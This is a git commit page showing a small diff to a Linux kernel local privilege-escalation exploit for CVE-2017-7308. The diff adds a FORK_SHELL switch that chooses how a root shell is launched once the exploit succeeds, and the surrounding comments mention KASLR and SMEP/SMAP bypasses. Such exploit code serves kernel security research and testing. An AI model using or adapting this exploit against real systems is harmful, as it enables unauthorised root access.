1
0

Add FORK_SHELL switch for CVE-2017-7308

This commit is contained in:
Andrey Konovalov 2019-08-30 15:36:46 +02:00 committed by Mikhail Klementev
parent eae8da349c
commit c8d8a74572

View File

@ -51,6 +51,9 @@
// - additional kernel targets // - additional kernel targets
// - additional KASLR bypasses // - additional KASLR bypasses
// https://github.com/bcoles/kernel-exploits/tree/master/CVE-2017-7308 // https://github.com/bcoles/kernel-exploits/tree/master/CVE-2017-7308
// ---
// Updated by Andrey Konovalov <andreyknvl@gmail.com>
// - add FORK_SHELL switch to specify shell launch mode
#define _GNU_SOURCE #define _GNU_SOURCE
@ -91,6 +94,9 @@
# define dprintf # define dprintf
#endif #endif
// It's recommended to enable this when running on a target system.
#define FORK_SHELL 0
#define ENABLE_KASLR_BYPASS 1 #define ENABLE_KASLR_BYPASS 1
#define ENABLE_SMEP_SMAP_BYPASS 1 #define ENABLE_SMEP_SMAP_BYPASS 1
@ -660,9 +666,13 @@ void check_root() {
dprintf("[+] got r00t ^_^\n"); dprintf("[+] got r00t ^_^\n");
#if FORK_SHELL
// Fork and exec instead of just doing the exec to avoid potential // Fork and exec instead of just doing the exec to avoid potential
// memory corruptions when closing packet sockets. // memory corruptions when closing packet sockets.
fork_shell(); fork_shell();
#else
exec_shell();
#endif
} }
bool write_file(const char* file, const char* what, ...) { bool write_file(const char* file, const char* what, ...) {
@ -775,7 +785,9 @@ int main(int argc, char *argv[]) {
check_root(); check_root();
#if FORK_SHELL
while (1) sleep(1000); while (1) sleep(1000);
#endif
return 0; return 0;
} }